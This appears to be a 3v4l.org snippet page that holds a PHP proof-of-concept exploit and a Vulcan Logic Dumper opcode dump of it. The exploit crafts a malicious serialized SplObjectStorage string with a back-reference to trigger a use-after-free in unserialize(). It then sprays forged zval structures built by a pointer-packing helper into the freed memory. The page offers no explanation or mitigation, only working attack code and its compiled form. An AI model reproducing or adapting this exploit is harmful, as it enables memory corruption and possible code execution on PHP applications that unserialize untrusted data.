3v4l.org

<?php

$fakezval = ptr2str(1234567);
$fakezval .= ptr2str(0);
$fakezval .= "\x00\x00\x00\x00";
$fakezval .= "\x01";
$fakezval .= "\x00";
$fakezval .= "\x00\x00";

$inner = 'x:i:0;m:a:0:{}';
$exploit = 'a:2:{i:0;C:16:"SplObjectStorage":'.strlen($inner).':{'.$inner.'}i:1;R:3;}';

$data = unserialize($exploit);

for ($i = 0; $i < 5; $i++) {
    $v[$i] = $fakezval.$i;
}

var_dump($data);

function ptr2str($ptr)
{
    $out = "";
    for ($i = 0; $i < 8; $i++) {
        $out .= chr($ptr & 0xff);
        $ptr >>= 8;
    }
    return $out;
}

Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 29
Branch analysis from position: 29
2 jumps found. (Code = 44) Position 1 = 31, Position 2 = 25
Branch analysis from position: 31
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 25
2 jumps found. (Code = 44) Position 1 = 31, Position 2 = 25
Branch analysis from position: 31
Branch analysis from position: 25
filename:       /in/JBfAU
function name:  (null)
number of ops:  35
compiled vars:  !0 = $fakezval, !1 = $inner, !2 = $exploit, !3 = $data, !4 = $i, !5 = $v
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    3     0  E >   INIT_FCALL_BY_NAME                                       'ptr2str'
          1        SEND_VAL_EX                                              1234567
          2        DO_FCALL                                      0  $6      
          3        ASSIGN                                                   !0, $6
    4     4        INIT_FCALL_BY_NAME                                       'ptr2str'
          5        SEND_VAL_EX                                              0
          6        DO_FCALL                                      0  $8      
          7        ASSIGN_OP                                     8          !0, $8
    5     8        ASSIGN_OP                                     8          !0, '%00%00%00%00'
    6     9        ASSIGN_OP                                     8          !0, '%01'
    7    10        ASSIGN_OP                                     8          !0, '%00'
    8    11        ASSIGN_OP                                     8          !0, '%00%00'
   10    12        ASSIGN                                                   !1, 'x%3Ai%3A0%3Bm%3Aa%3A0%3A%7B%7D'
   11    13        STRLEN                                           ~15     !1
         14        CONCAT                                           ~16     'a%3A2%3A%7Bi%3A0%3BC%3A16%3A%22SplObjectStorage%22%3A', ~15
         15        CONCAT                                           ~17     ~16, '%3A%7B'
         16        CONCAT                                           ~18     ~17, !1
         17        CONCAT                                           ~19     ~18, '%7Di%3A1%3BR%3A3%3B%7D'
         18        ASSIGN                                                   !2, ~19
   13    19        INIT_FCALL                                               'unserialize'
         20        SEND_VAR                                                 !2
         21        DO_ICALL                                         $21     
         22        ASSIGN                                                   !3, $21
   15    23        ASSIGN                                                   !4, 0
         24      > JMP                                                      ->29
   16    25    >   CONCAT                                           ~25     !0, !4
         26        ASSIGN_DIM                                               !5, !4
         27        OP_DATA                                                  ~25
   15    28        PRE_INC                                                  !4
         29    >   IS_SMALLER                                               !4, 5
         30      > JMPNZ                                                    ~27, ->25
   19    31    >   INIT_FCALL                                               'var_dump'
         32        SEND_VAR                                                 !3
         33        DO_ICALL                                                 
   29    34      > RETURN                                                   1

Function ptr2str:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 11
Branch analysis from position: 11
2 jumps found. (Code = 44) Position 1 = 13, Position 2 = 4
Branch analysis from position: 13
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 4
2 jumps found. (Code = 44) Position 1 = 13, Position 2 = 4
Branch analysis from position: 13
Branch analysis from position: 4
filename:       /in/JBfAU
function name:  ptr2str
number of ops:  15
compiled vars:  !0 = $ptr, !1 = $out, !2 = $i
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   21     0  E >   RECV                                             !0      
   23     1        ASSIGN                                                   !1, ''
   24     2        ASSIGN                                                   !2, 0
          3      > JMP                                                      ->11
   25     4    >   INIT_FCALL                                               'chr'
          5        BW_AND                                           ~5      !0, 255
          6        SEND_VAL                                                 ~5
          7        DO_ICALL                                         $6      
          8        ASSIGN_OP                                     8          !1, $6
   26     9        ASSIGN_OP                                     7          !0, 8
   24    10        PRE_INC                                                  !2
         11    >   IS_SMALLER                                               !2, 8
         12      > JMPNZ                                                    ~10, ->4
   28    13    > > RETURN                                                   !1
   29    14*     > RETURN                                                   null

End of function ptr2str

Generated using Vulcan Logic Dumper, using php 8.0.0

